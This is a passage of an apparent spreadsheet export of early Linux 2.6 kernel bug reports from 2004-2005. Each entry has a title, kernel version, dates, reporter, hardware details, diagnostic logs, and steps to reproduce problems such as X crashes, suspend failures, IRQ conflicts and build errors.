    <t>Islam Motab</t>
  </si>
  <si>
    <t>2005-05-25 17:47 UTC</t>
  </si>
  <si>
    <t>Distribution: self built LFS 6.0 Hardware Environment:x86 PC lspci output: 00:00.0 Host bridge: Intel Corp. 82815 815 Chipset Host Bridge and Memory Controller Hub (rev 04) 00:01.0 PCI bridge: Intel Corp. 82815 815 Chipset AGP Bridge (rev 04) 00:1e.0 PCI bridge: Intel Corp. 82801BA/CA/DB PCI Bridge (rev 11) 00:1f.0 ISA bridge: Intel Corp. 82801BA ISA Bridge (LPC) (rev 11) 00:1f.1 IDE interface: Intel Corp. 82801BA IDE U100 (rev 11) 00:1f.2 USB Controller: Intel Corp. 82801BA/BAM USB (Hub #1) (rev 11) 00:1f.3 SMBus: Intel Corp. 82801BA/BAM SMBus (rev 11) 00:1f.4 USB Controller: Intel Corp. 82801BA/BAM USB (Hub #2) (rev 11) 01:00.0 VGA compatible controller: nVidia Corporation NV11 [GeForce2 MX DDR] (rev b2) 02:01.0 Multimedia audio controller: C-Media Electronics Inc CM8738 (rev 10) 02:02.0 Communication controller: Rockwell International HCF 56k Data/Fax/Voice/Spkp (w/Handset) Modem (rev 01) Software Environment: Linux Phaeronix 2.6.10-rc3-ck1 #1 SMP Tue Dec 14 14:33:35 EET 2004 i686 pentium3 i386 GNU/Linux Gnu C 3.4.3 Gnu make 3.80 binutils 2.15.92.0.2 util-linux 2.12h mount 2.12h module-init-tools 3.0 e2fsprogs 1.35 jfsutils 1.1.7 reiserfsprogs 3.6.19 reiser4progs 1.0.2 xfsprogs 2.6.25 PPP 2.4.3 Linux C Library 2.3.3 Dynamic linker (ldd) 2.3.3 Linux C++ Library 6.0.3 Procps 3.2.3 Net-tools 1.60 Kbd 1.12 Sh-utils 5.2.1 X Window System Version 6.8.1 Release Date: 17 September 2004 X Protocol Version 11, Revision 0, Release 6.8.1 Build Operating System: Linux 2.6.10-rc2-mm1 i686 [ELF] Problem Description: After compiling and booting into 2.6.10-rc3-mm1, X.org draws the grey backdround and then crashes at the first attempt to draw anything. This only happens with mm because ( as obvious above ) using vanilla or ck the problem disppears. The error output from X is cryptic: XIO: fatal IO error 25 (Inappropriate ioctl for device) on X server ":0.0" after 118 requests (115 known processed) with 10 events remaining. dmesg shows no other error. I tried to boot with pci=routeirq but that didn't help. Steps to reproduce: Compile 2.6.10-rc3-mm1 reboot into new kernel boot goes fine X.org starts and draws grey background. X.org crashes Thank you.</t>
  </si>
  <si>
    <t>pnpacpi rsparser bug</t>
  </si>
  <si>
    <t>2004-12-17 08:28 UTC</t>
  </si>
  <si>
    <t>2005-07-24 19:18 UTC</t>
  </si>
  <si>
    <t>The possible resource are not well parsed. See : http://marc.theaimsgroup.com/?l=linux-kernel&amp;m=110106097404193&amp;w=2</t>
  </si>
  <si>
    <t>Suzuki</t>
  </si>
  <si>
    <t>AMD64/ATI : timer is running twice as fast as it should</t>
  </si>
  <si>
    <t>2.6.15</t>
  </si>
  <si>
    <t>Few errors in pktgen.c</t>
  </si>
  <si>
    <t>&lt;=2.6.10</t>
  </si>
  <si>
    <t>2004-12-29 04:13 UTC</t>
  </si>
  <si>
    <t>Nikolai Malykh</t>
  </si>
  <si>
    <t>2004-12-30 00:41 UTC</t>
  </si>
  <si>
    <t>Distribution: All Hardware Environment: All Software Environment: All Problem Description: Incorrect parameters handling in pktgen.c Steps to reproduce: Try to use pktgen without srcmac, src_mac_count and MACSRC_RND. Source MAC header fields in generated frames will be 00:00:00:00:00:00 instead interface MAC I've correct version of this module.</t>
  </si>
  <si>
    <t>2.6.10-bk2 patch causes compile error in floppy.c</t>
  </si>
  <si>
    <t>2.6.10-bk2</t>
  </si>
  <si>
    <t>2004-12-29 07:36 UTC</t>
  </si>
  <si>
    <t>rick</t>
  </si>
  <si>
    <t>2005-01-07 16:13 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 3 Hardware Environment: Software Environment: Problem Description: -bk2 patch for 2.6.10 removes #include &lt;linux/version.h&gt; from drivers/block/floppy.c, causing printk at line 4598 in floppy.c that references UTS_RELEASE to fail to compile. Reinserting #include fixes problem. Steps to reproduce:</t>
  </si>
  <si>
    <t>S3 suspend fails with mdnsresponder running</t>
  </si>
  <si>
    <t>2.6.9-ac13</t>
  </si>
  <si>
    <t>2004-12-29 08:46 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sid Hardware Environment: Asus M2400N Centrino laptop Software Environment: Problem Description: Linux won't go into S3 suspend if mdnsresponder is running. Steps to reproduce: 1. Start mdnsresponder 2. Try to suspend 3. Suspend fails with: PM: Preparing system for suspend Stopping tasks: =============================================================================================================================================== stopping tasks failed (1 tasks remaining) Restarting tasks...&lt;6&gt; Strange, mDNSResponder not stopped done</t>
  </si>
  <si>
    <t>broken module aliases in ieee1394 drivers</t>
  </si>
  <si>
    <t>2004-12-29 10:20 UTC</t>
  </si>
  <si>
    <t>2005-10-29 04:49 UTC</t>
  </si>
  <si>
    <t>$ grep MODULE_ALIAS_CHARDEV drivers/ieee1394/*.c drivers/ieee1394/amdtp.c:MODULE_ALIAS_CHARDEV(IEEE1394_MAJOR, IEEE1394_MINOR_BLOCK_AMDTP * 16); drivers/ieee1394/dv1394.c:MODULE_ALIAS_CHARDEV(IEEE1394_MAJOR, IEEE1394_MINOR_BLOCK_DV1394 * 16); drivers/ieee1394/raw1394.c:MODULE_ALIAS_CHARDEV(IEEE1394_MAJOR, IEEE1394_MINOR_BLOCK_RAW1394 * 16); drivers/ieee1394/video1394.c:MODULE_ALIAS_CHARDEV(IEEE1394_MAJOR, IEEE1394_MINOR_BLOCK_VIDEO1394 * 16); These lines produce broken entries in the module info (like "alias=char-major-171-3 * 16"), which depmod then carries to the modules.alias file. Currently depmod and modprobe do not complain about this brokenness.</t>
  </si>
  <si>
    <t>Failed to acquire semaphore ACPI_MTX_HARDWARE</t>
  </si>
  <si>
    <t>2004-12-30 00:08 UTC</t>
  </si>
  <si>
    <t>I test the latest kernel in a HP nx5000, which includes the RTC fix. I observed some error message: Failed to acquire semaphore ACPI_MTX_HARDWARE After digging out, It appears 'acpi_install_fixed_event_handler' prepares to install RTC handler, and in the meantime a RTC interrupt is generated. Exactly the interrupt is invoked when ACPICA does: status = acpi_enable_event (event, 0); But I can't always reproduce it. Below steps is the more reliable reproduce steps, but it also can't be trust. 1. Set /proc/acpi/alarm. wait it timeout 2. reboot; Then we will see the error message.</t>
  </si>
  <si>
    <t>accessing samba shares yelds Slab corruption</t>
  </si>
  <si>
    <t>2005-01-01 14:13 UTC</t>
  </si>
  <si>
    <t>2008-03-05 16:57 UTC</t>
  </si>
  <si>
    <t>Distribution: FC2 Hardware Environment: x86 Problem Description: Trying to access the samba shares, I am getting the Slab corruption messages and the system became unstable. This problem was already discussed on LKML and Andrew located the broken code, but it is still not resolved: http://marc.free.net.ph/message/20041027.000343.74f4a932.html http://lkml.org/lkml/2004/11/13/75 http://lkml.org/lkml/2004/11/15/119 I am opening the report for it so to not let it to get forgotten. This is rather severe problem, I'd be happy if it is fixed. I can't use smbfs as it currently is.</t>
  </si>
  <si>
    <t>APIC error when going into S3</t>
  </si>
  <si>
    <t>2.6.10-acpi / 2.6.10-rc3-mm1</t>
  </si>
  <si>
    <t>2005-01-03 04:24 UTC</t>
  </si>
  <si>
    <t>Roland Schulz</t>
  </si>
  <si>
    <t>2005-02-22 09:39 UTC</t>
  </si>
  <si>
    <t>Distribution: Suse 9.2 Hardware Environment: hp pavilion zv5000 Problem Description: crashes going into S3 state with APIC error 80(08) See below for detailed error (screenshot) and the DSDT</t>
  </si>
  <si>
    <t>disabling IRQ #19 - non-shared irq</t>
  </si>
  <si>
    <t>~2.6.8+</t>
  </si>
  <si>
    <t>2005-01-04 14:48 UTC</t>
  </si>
  <si>
    <t>Simon Cooper</t>
  </si>
  <si>
    <t>2005-06-04 00:48 UTC</t>
  </si>
  <si>
    <t>I've had this problem ever since 2.6.8 or 9, i cant really remember. The network card starts fine, but whenever I try to stop it dhcpcd and ifconfig hang and the following gets put in /var/log/messages. I can't start the network card again. Jan 4 22:28:09 src@tachyon dhcpcd[11582]: terminating on signal 15 Jan 4 22:28:17 src@tachyon rc-scripts: timed out Jan 4 22:28:27 src@tachyon irq 19: nobody cared! Jan 4 22:28:27 src@tachyon [&lt;c013de06&gt;] __report_bad_irq+0x2a/0x8d (8) Jan 4 22:28:27 src@tachyon [&lt;c013df1f&gt;] note_interrupt+0x9c/0xbd (20) Jan 4 22:28:27 src@tachyon [&lt;c013d7c3&gt;] __do_IRQ+0x16a/0x177 (28) Jan 4 22:28:27 src@tachyon [&lt;c01053e9&gt;] do_IRQ+0x19/0x24 (40) Jan 4 22:28:27 src@tachyon [&lt;c01039f6&gt;] common_interrupt+0x1a/0x20 (4) Jan 4 22:28:27 src@tachyon [&lt;c0101041&gt;] default_idle+0x23/0x2a (44) Jan 4 22:28:27 src@tachyon [&lt;c01010dd&gt;] cpu_idle+0x62/0x64 (12) Jan 4 22:28:27 src@tachyon [&lt;c02ab592&gt;] acpi_enable_subsystem+0x29/0x55 (4) Jan 4 22:28:27 src@tachyon [&lt;c01002ce&gt;] _stext+0x3a/0x42 (8) Jan 4 22:28:27 src@tachyon [&lt;c0526935&gt;] start_kernel+0x167/0x180 (16) Jan 4 22:28:27 src@tachyon [&lt;c0526332&gt;] unknown_bootoption+0x0/0x1fc (20) Jan 4 22:28:27 src@tachyon handlers: Jan 4 22:28:27 src@tachyon [&lt;c02dcc69&gt;] (rtl8169_interrupt+0x0/0x134) Jan 4 22:28:27 src@tachyon Disabling IRQ #19 I get the same messages whether I use pci=routeirq or not. relevant information (/proc/interrupts, lspci, dmesg, .config) is at http;//thecoop.dyndns.org/outputs</t>
  </si>
  <si>
    <t>(net 8390) possible wrong register offset in 8390 driver</t>
  </si>
  <si>
    <t>2005-01-04 18:50 UTC</t>
  </si>
  <si>
    <t>Atsushi Nemoto</t>
  </si>
  <si>
    <t>2005-09-23 02:19 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Software Environment: Problem Description: I found a possible wrong register offset usage in NS8390_trigger_send. The line is 1099 in 2.6.10. 'inb_p(e8390_base)' should be 'inb_p(e8390_base+E8390_CMD)'. Steps to reproduce:</t>
  </si>
  <si>
    <t>(net bonding) Not correct work function ARP Monitoring. Broken link.</t>
  </si>
  <si>
    <t>2005-01-05 07:59 UTC</t>
  </si>
  <si>
    <t>Muhachev Stanislav</t>
  </si>
  <si>
    <t>2005-08-31 03:02 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Vmware GSX machine Software Environment: Gentoo Problem Description: bonding interface going down and down slave link Steps to reproduce: 2 virtual pc identical gentoo linux (copy) 1 nic for both virtual pc up 2 openvpn link trouch nic to another virtual pc (tap0 and tap1)[ethernet bridge] link both vpn1 and vpn2 - ok!(independing link like:192.168.1.1-192.168.1.2 and 192.168.2.1-192.168.2.2) bonding vpn1 &amp; vpn2 ?? bond0 (bonding default setup -&gt; nothing failover setings) link ??!(192.168.100.1-192.168.100.2) setting arp monitor in bonding (TUN/TAP driver not support Mii status) link down! arp request go from bond0(machine1)[from tap0 &amp; tap1] to bond0(machine2) - ok. arp answer bond0(machine2) interface - ok! !!! bond0(machine2) -&gt; tap0(tap1)(machine2) - noting!!!(arp answer broken) resultat arp request not complite situation analog both side for monitoring use TCPDUMP</t>
  </si>
  <si>
    <t>DECchip 21152 bridge has resource conflict and isn't working properly</t>
  </si>
  <si>
    <t>2005-01-05 23:22 UTC</t>
  </si>
  <si>
    <t>Herbert P</t>
  </si>
  <si>
    <t>2005-01-08 14:48 UTC</t>
  </si>
  <si>
    <t>Distribution: Modified Mandrake 10.x Hardware Environment: Tyan Tiger i7501R S2735, dual Intel Xeon CPU 2.80GHz Software Environment: Linux 2.6.10 Problem Description: Quad Server Nic DFE-570TX, with DECchip 21152 PCI bridge (and 4x DECchip 21142/3 behind it) doesn't work because? kernel reports: PCI: Cannot allocate resource region 9 of bridge 0000:01:04.0 lspci -vv output can be found at: http://vserver.13thfloor.at/Stuff/lspci_vv.txt Steps to reproduce: reboot machine ;)</t>
  </si>
  <si>
    <t>radeonfb: Laptop Panel gets black on switch to frame buffer device 175x65</t>
  </si>
  <si>
    <t>2005-01-06 04:14 UTC</t>
  </si>
  <si>
    <t>Michael Borgelt</t>
  </si>
  <si>
    <t>2005-10-02 05:12 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: Acer extensa 2902LMi Laptop ATI mobility Radeon 9700 0000:01:00.0 VGA compatible controller: ATI Technologies Inc RV350 [Mobility Radeon 9600 M10] Software Environment: Problem Description: Laptop Panel gets black on switch to frame buffer device 175x65. Even starting Xfree won't give me a Signal on the Panel. With Kernel 2.6.9 it works. Only 1 out of 10 reboots fail. Steps to reproduce: Panel will work after a few reboots. There are no differences in logfiles from a faild boot and a succesfull boot. I will compile a Kernel with radeonfb debuging turnd on this evening and see if I get any clou's from the debug output.</t>
  </si>
  <si>
    <t>build error with ac5</t>
  </si>
  <si>
    <t>2.6.10 ac5</t>
  </si>
  <si>
    <t>2005-01-07 03:27 UTC</t>
  </si>
  <si>
    <t>peter grotz</t>
  </si>
  <si>
    <t>2005-01-07 16:10 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE 9.2 Hardware Environment: AMD 1,3GHz 256MB Software Environment: 2.6.10 ac2 Problem Description: build error: drivers/built-in.o(.text+0x9e533): in function 'idepnp_remove': undefined reference to 'removed_hwif_ops' bad exit Steps to reproduce: build kernel 2.6.10 with ac5</t>
  </si>
  <si>
    <t>kernel can't detect ipod</t>
  </si>
  <si>
    <t>2.6.10-ac4</t>
  </si>
  <si>
    <t>2005-01-07 07:54 UTC</t>
  </si>
  <si>
    <t>2005-11-10 11:29 UTC</t>
  </si>
  <si>
    <t>Distribution:Gentoo Linux Hardware Environment:Athlon 2500+ nforce2 (use ohci1394 module) Software Environment: Problem Description: when pluggin ipod at 1394 port, kernel can't detect ipod, kernel message says like this. ieee1394: Node added: ID:BUS[0-01:1023] GUID[000a270002573bda] ieee1394: The root node is not cycle master capable; selecting a new root node and resetting... ohci1394: fw-host0: SelfID received outside of bus reset sequence ieee1394: Node changed: 0-01:1023 -&gt; 0-00:1023 ieee1394: Node changed: 0-00:1023 -&gt; 0-01:1023 so i modified nodemgr_do_irm_duties() in drivers/ieee1394/nodemgr.c if (ne &amp;&amp; ne-&gt;busopt.cmc) hpsb_send_phy_config(host, root_node, -1); #if 0 else { HPSB_DEBUG(... ... blah blah return 0; } #endif after load modified ieee1394.ko, kernel can detect ipod right now.</t>
  </si>
  <si>
    <t>PnP drivers sets up legacy interrupts incorrectly on ES7000</t>
  </si>
  <si>
    <t>2005-01-09 12:53 UTC</t>
  </si>
  <si>
    <t>2005-06-29 09:14 UTC</t>
  </si>
  <si>
    <t>Distribution: any that will use 2.6.10 Hardware Environment: ES7000 IA-32 servers Software Environment: System initialization Problem Description: I tested the new 2.6.10 and found that the system was not booting, because interrupts were not set up right. After some debugging it turned out that the new PnP driver sets up standard legacy entries, without regards to the IRQ overrides that were processed by the time the PnP driver kicked in. Later on, the PCI devices try to set up their pins (correctly) and find them already set as ISA... and leave them as is. The system comes up with wrong interrupt settings (if comes up at all, depending upon if the boot controller was affected). I realized that the PnP started using _CRS and _PRS now. IRQ entries in _CRS and _PRS on ES7000 do not correspond to the overrides. I think that it should be some safeguard or back door of the quirk nature, since it is not clear if the IRQ entries in _CRS/PRS should reflect overrides or the overrides should be applied to them. There is a table of "excused" PNP devices, but I cannot really use it because for us it is a mouse, a keyboard, etc. I could use "quirks", but ACPI portion doesn't have it. I can disable PNP ACPI during build, of course, but SuSE/RH will likely make it default for their builds. Steps to reproduce: Build 2.6.10 kernel with PnP ACPI enabled and boot</t>
  </si>
  <si>
    <t>oops when reading some FAT directories containing CJK filenames</t>
  </si>
  <si>
    <t>2.6.10, 2.6.10-bk12</t>
  </si>
  <si>
    <t>2005-01-09 14:32 UTC</t>
  </si>
  <si>
    <t>2005-01-14 06:49 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 2 and 3 Hardware Environment: Doesn't seem to matter... Software Environment: Typically it happens when a system dual-boots with Windows, Windows is installed on a FAT partition, and that partition happens to contain CJK (Chinese, Japanese, or Korean) filenames. However, I will be attaching a small test filesystem to this bug so that other people can also reproduce it. Problem Description: Many people are getting oopses when they try to access files on their FAT32 Windows partitions from Linux. There is more information in Red Hat Bugzilla bug number 129966: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=129966 I am filing this upstream bug because I have now reproduced the bug on vanilla 2.6.10 and on 2.6.10-bk12 (as well as on 2.6.10-mm2 for that matter). I would like to thank Don Hardaway for capturing some data off his own system and attaching it to the RH Bugzilla bug. Without that data, I would have been unable to create an easy reproduction procedure for this bug. Steps to reproduce: 1. Download my attachment and save it as "oops.144.gz". (It will be the same as RH Bugzilla attachment number 109539.) 2. zcat oops.144.gz &gt; oops.144 (or some other method of decompressing) 3. As root: mount -o loop,ro,uni_xlate oops.144 /mnt/wherever (use utf8 instead of uni_xlate if you want to look at the filesystem without oopsing instead) 4. (for example) ls /mnt/wherever/oopsoops, or find /mnt/wherever/oopsoops, or...</t>
  </si>
  <si>
    <t>w83627hf and w83781d  don't create entries in sysfs</t>
  </si>
  <si>
    <t>2005-01-09 17:09 UTC</t>
  </si>
  <si>
    <t>Cengiz ALKAN</t>
  </si>
  <si>
    <t>2005-11-15 10:10 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Pentium 4, Asus WMT-LX Software Environment: kernel 2.6.10 Problem Description: i2c chip module w83627hf and w83781d don't create entries under /sys/bus/i2c/devices/. None of the hardware sensors information, including the root directory (/sys/bus/i2c/devices/*-0290) doesn't show up. The same configiration works with kernel 2.6.9 and before. I have enabled "Device Drivers &gt; I2C Support &gt; I2C Chip debugging messages", but there is no related entry in the kernel messages (or I don't know where to look for those debugging messages) The output of "lsmod | grep i2c": i2c_sensor 3200 1 w83627hf i2c_dev 7808 0 i2c_isa 1920 0 i2c_core 18960 4 w83627hf,i2c_sensor,i2c_dev,i2c_isa Steps to reproduce: modprobe i2c-isa w83627hf i2c-dev</t>
  </si>
  <si>
    <t>Plug and Play ACPI breaks sound</t>
  </si>
  <si>
    <t>2.6.10-ac8</t>
  </si>
  <si>
    <t>2005-01-10 08:37 UTC</t>
  </si>
  <si>
    <t>2005-07-27 19:01 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sid Hardware Environment: Asus M2400N Centrino Laptop Software Environment: Tested with 2.6.10-ac8,ac6,ac2. Should happen with any 2.6.10. Problem Description: Using "Plug and Play ACPI support" breaks the soundcard as IRQ 7 is assigned to parport. Without PnP ACPI: -------------------- Advanced Linux Sound Architecture Driver Version 1.0.6 (Sun Aug 15 07:17:53 2004 UTC). PCI: Enabling device 0000:00:1f.5 (0005 -&gt; 0007) ACPI: PCI interrupt 0000:00:1f.5[B] -&gt; GSI 7 (level, low) -&gt; IRQ 7 PCI: Setting latency timer of device 0000:00:1f.5 to 64 ieee1394: Host added: ID:BUS[0-00:1023] GUID[00e01800030be9ec] intel8x0_measure_ac97_clock: measured 49479 usecs intel8x0: clocking to 48000 ALSA device list: #0: Intel 82801DB-ICH4 with STAC9721/23 at 0x2f800400, irq 7 ------------------- With PnP ACPI: ------------------- Advanced Linux Sound Architecture Driver Version 1.0.6 (Sun Aug 15 07:17:53 2004 UTC). PCI: Enabling device 0000:00:1f.5 (0005 -&gt; 0007) ACPI: PCI interrupt 0000:00:1f.5[B] -&gt; GSI 7 (level, low) -&gt; IRQ 7 unable to grab IRQ 7 Intel ICH: probe of 0000:00:1f.5 failed with error -16 ALSA device list: No soundcards found. -------------- Without PnP ACPI parport is used in polling mode. Steps to reproduce: 1.Enable PnP ACPI in the kernel.</t>
  </si>
  <si>
    <t>Ernst Sjöstrand</t>
  </si>
  <si>
    <t>Failure to detect Master and Slave drives using firewire</t>
  </si>
  <si>
    <t>2005-01-11 14:08 UTC</t>
  </si>
  <si>
    <t>Pete</t>
  </si>
  <si>
    <t>2005-07-24 01:47 UTC</t>
  </si>
  <si>
    <t>Distribution: FC2 &amp; FC3 Hardware Environment: Multiple i686, Oxford 911 controllers Software Environment: FC2 &amp; FC3 Problem Description: When using external firewire drives with master / slave drives, only one drive per controller is detected. It appears that when both drives are present it notices the slave drive. When only one drive is present it notices master. The drive it ends up noticing functions properly. Steps to reproduce: Add an external firewire controller with two drives configured master and slave. PS. I have a system with six (6) Oxford controllers, so it's not a failed hardware issue.</t>
  </si>
  <si>
    <t>assertion failed at net/ipv6/addrconf.c, plus halt fails</t>
  </si>
  <si>
    <t>2.6.9 &amp; 2.6.10, kernel.org tree</t>
  </si>
  <si>
    <t>2005-01-12 15:38 UTC</t>
  </si>
  <si>
    <t>2006-12-08 14:42 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Alpha 164LX 21164a 600MHz Software Environment: Debian unstable Problem Description: During bootup, I am getting multiple instances ofitems like this, typically when a daemon starts up: Jan 12 17:23:38 erwin kernel: RTNL: assertion failed at net/ipv6/addrconf.c (1992) Trace shows: Jan 12 17:23:38 erwin kernel: Trace: Jan 12 17:23:38 erwin kernel: [sk_free+324/336] sk_free+0x144/0x150 Jan 12 17:23:38 erwin kernel: [inet_release+128/160] inet_release+0x80/0xa0 Jan 12 17:23:38 erwin kernel: [sock_release+172/240] sock_release+0xac/0xf0 Jan 12 17:23:38 erwin kernel: [sock_close+48/112] sock_close+0x30/0x70 Jan 12 17:23:38 erwin kernel: [__fput+412/448] __fput+0x19c/0x1c0 Jan 12 17:23:38 erwin kernel: [fput+72/96] fput+0x48/0x60 Jan 12 17:23:38 erwin kernel: [filp_close+132/240] filp_close+0x84/0xf0 Jan 12 17:23:38 erwin kernel: [close_files+172/224] close_files+0xac/0xe0 Jan 12 17:23:38 erwin kernel: [put_files_struct+84/224] put_files_struct+0x54/0xe0 Jan 12 17:23:39 erwin kernel: [do_exit+508/1424] do_exit+0x1fc/0x590 Jan 12 17:23:39 erwin kernel: [do_group_exit+60/176] do_group_exit+0x3c/0xb0 Jan 12 17:23:39 erwin kernel: [entSys+164/192] entSys+0xa4/0xc0 The system appears to function normally after bootup. However, when it comes time to halt the system, I cannot. It stalls with: unregister_netdevice: waiting for sit1 to become free. Usage count = 1 This machine is acting as a firewall. I have two Ethernet devices in it; one for the outside and one for the inside. The outside speaks only IPv4. Inside speaks IPv4 and IPv6. IPv6 is routed to the outside via sit1, using the public 6to4 router address. I will attach dmesg logs, ksymoops output, configurations, etc. This behavior was observed on both 2.6.9 and 2.6.10. Please ask if there is any other information you would need to resolve this problem. I am quite happy to provide anything that may be of use.</t>
  </si>
  <si>
    <t>Incorrect parameters handling in pktgen.c.</t>
  </si>
  <si>
    <t>&lt;= 2.6.10</t>
  </si>
  <si>
    <t>2005-01-13 08:29 UTC</t>
  </si>
  <si>
    <t>2005-01-15 08:29 UTC</t>
  </si>
  <si>
    <t>Distribution: kernel source Hardware Environment: ALL Software Environment: ALL Problem Description: Incorrect handling cur_udp_dst and cur_udp_src in function mod_cur_headers(). Few mistakes in Documentation/networking/pktgen.txt Steps to reproduce: set udp_src_min &gt; udp_src_max or/and udp_dst_min &gt;= udp_dst_max in packet generation script</t>
  </si>
  <si>
    <t>input: AT Translated Set 2 keyboard on isa0060/serio0</t>
  </si>
  <si>
    <t>2005-01-14 04:51 UTC</t>
  </si>
  <si>
    <t>Emanuel Argui</t>
  </si>
  <si>
    <t>2006-04-22 05:59 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian testing - sarge Hardware Environment: (three machines) Intel(R) Pentium(R) 4 CPU 1600MHz, (one machine) AMD Athlon(tm) XP 2800+ Software Environment: Problem Description: When switching back to my machine using a KVM, i have two problems: one with the mouse (is solved in Bug#: 779) and the othe with the keyboard "input: AT Translated Set 2 keyboard on isa0060/serio0" Steps to reproduce: This bug it appears only when i use the kvm switch.</t>
  </si>
  <si>
    <t>a kexec patch causes poweroff to hang on some computers</t>
  </si>
  <si>
    <t>2.6.11-rc1-mm1</t>
  </si>
  <si>
    <t>2005-01-14 09:10 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 2 or 3, or a highly stripped down "distribution" (which I will attach to this bug) Hardware Environment: Intel D815EGEW motherboard; IOGear 2-head KVM switch (need to retest without the KVM, but I'll do that after I file this bug) Software Environment: Minimal test environment consists of an ext2 partition with two directories, /lost+found and /sbin, and one file, /sbin/init Problem Description: Some computers hang instead of properly shutting down when the following patch is applied to the kernel tree: kexec-i8259-shutdowni386.patch (That is, the problem disappears from 2.6.11-rc1-mm1 once this patch is reverted, and it appears on 2.6.11-rc1 plus just this patch.) This problem was pretty widely seen with 2.6.9-based Fedora kernels, which included kexec patches from 2.6.9-mm: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=132761 Steps to reproduce: 1. Install kernel 2. Boot without disabling ACPI. 3. Run "shutdown -h now". In more detail, for a minimal test environment: 1. Compile a minimal test kernel, preferably one that does not use modules and that will fit onto a single floppy disk. I will be attaching one of the .configs that I used. 2. Run "rdev arch/i386/boot/bzImage /dev/hda2", where "/dev/hda2" is the ext2 partition that you will install the minimal /sbin/init. 3. Prepare a floppy disk with the SYSLINUX boot loader (I used version 2.08). 4. Create a syslinux.cfg file on the floppy with the following line: default bzimage 5. Add appropriate arguments for a serial console if needed. 6. Copy arch/i386/boot/bzImage onto the floppy. 7. gcc -Os -static -o powerforce powerforce.c (I will attach the source) 8. strip powerforce 9. Copy powerforce onto the ext2 partition as /sbin/init. 10. Reboot from the floppy. 11. See whether the computer shuts down properly or not. 12. To continue testing, reconfigure/repatch/change your kernel and/or syslinux.cfg as needed, and repeat steps 1, 2, 6, 10-12 (or so) as needed. Give me some time to attach everything (i.e. if you see this bug and not all the attachments are here, come back in half an hour or something).</t>
  </si>
  <si>
    <t>KALLSYMS_EXTRA_PASS fails make if not selected</t>
  </si>
  <si>
    <t>2.6.10 vanilla</t>
  </si>
  <si>
    <t>2005-01-15 01:32 UTC</t>
  </si>
  <si>
    <t>Ed</t>
  </si>
  <si>
    <t>2005-01-15 16:41 UTC</t>
  </si>
  <si>
    <t>'SIOCSIFADDR: Cannot allocate memory' error after 'ifup sit0'</t>
  </si>
  <si>
    <t>2005-01-16 13:14 UTC</t>
  </si>
  <si>
    <t>Arnoldas</t>
  </si>
  <si>
    <t>2005-02-18 10:42 UTC</t>
  </si>
  <si>
    <t>Distribution: debian woody 3.0 Hardware Environment: CPU: processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 6 model name : Celeron (Mendocino) stepping : 5 cpu MHz : 468.024 cache size : 128 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pat pse36 mmx fxsr bogomips : 915.45 lspci -vvv output: 0000:00:00.0 Host bridge: VIA Technologies, Inc. VT82C693A/694x [Apollo PRO133x] (rev 22) Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR+ Latency: 0 Region 0: Memory at da000000 (32-bit, prefetchable) [size=4M] Capabilities: [a0] AGP version 1.0 Status: RQ=8 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW- AGP3- Rate=x1 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=&lt;none&gt; 0000:00:01.0 PCI bridge: VIA Technologies, Inc. VT82C598/694x [Apollo MVP3/Pro133x AGP] (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 0000f000-00000fff Memory behind bridge: fff00000-000fffff Prefetchable memory behind bridge: fff00000-000fffff BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- 0000:00:07.0 ISA bridge: VIA Technologies, Inc. VT82C596 ISA [Mobile South] (rev 09) Subsystem: VIA Technologies, Inc. VT82C596/A/B PCI to ISA Bridge Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 0000:00:07.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 06) (prog-if 8a [Master SecP PriP]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 Region 4: I/O ports at d000 [size=16] 0000:00:07.3 Host bridge: VIA Technologies, Inc. VT82C596 Power Management Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- 